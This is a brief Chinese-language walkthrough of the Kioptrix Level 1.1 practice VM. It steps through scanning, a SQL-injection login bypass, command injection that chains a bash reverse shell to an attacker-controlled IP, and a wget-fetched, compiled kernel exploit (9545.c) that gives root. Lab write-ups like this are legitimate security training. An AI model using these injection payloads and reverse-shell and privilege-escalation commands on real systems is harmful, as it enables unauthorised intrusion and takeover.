kioptrix level1.1

kioptrix level-1.1

存活检测

端口扫描

80访问

查看源代码

尝试爆破，先试一下，无结果

尝试万能密码，sql注入

万能密码可以绕过登录

替换数据包进行登录

登录成功

命令执行

反弹shell

127.0.0.1 |  bash -i >& /dev/tcp/192.168.245.183/5454 0>&1
nv -lvvp 5454

提权

uname -a 查看版本

Linux kioptrix.level2 2.6.9-55.EL #1 Wed May 2 13:52:16 EDT 2007 i686 i686 i386 GNU/Linux

searchsploit 9545

/usr/share/exploitdb/exploits/linux/local/9545.c

└─# nc -lvvp 5454                                                                                                                                                          1 ⨯
listening on [any] 5454 ...
connect to [192.168.245.183] from localhost [192.168.245.97] 32773
bash: no job control in this shell
bash-3.00$ cd /tmp
bash-3.00$ wget http://192.168.245.183/9545.c
--00:27:28--  http://192.168.245.183/9545.c
           => `9545.c'
Connecting to 192.168.245.183:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 9,408 (9.2K) [text/plain]

    0K .........                                             100%  640.87 MB/s

00:27:28 (640.87 MB/s) - `9545.c' saved [9408/9408]

bash-3.00$ ls
9545.c
bash-3.00$ gcc -o muma 9545.c
9545.c:376:28: warning: no newline at end of file
bash-3.00$ ls
9545.c
muma
bash-3.00$ ./muma
sh: no job control in this shell
sh-3.00# whoami
root
sh-3.00#